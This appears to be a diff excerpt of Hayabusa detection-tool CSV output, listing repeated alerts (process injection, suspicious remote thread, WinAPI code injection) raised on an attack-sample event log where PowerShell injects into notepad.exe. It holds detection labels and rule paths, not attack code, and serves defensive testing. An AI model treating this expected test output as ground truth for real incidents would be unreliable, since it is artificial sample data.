+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
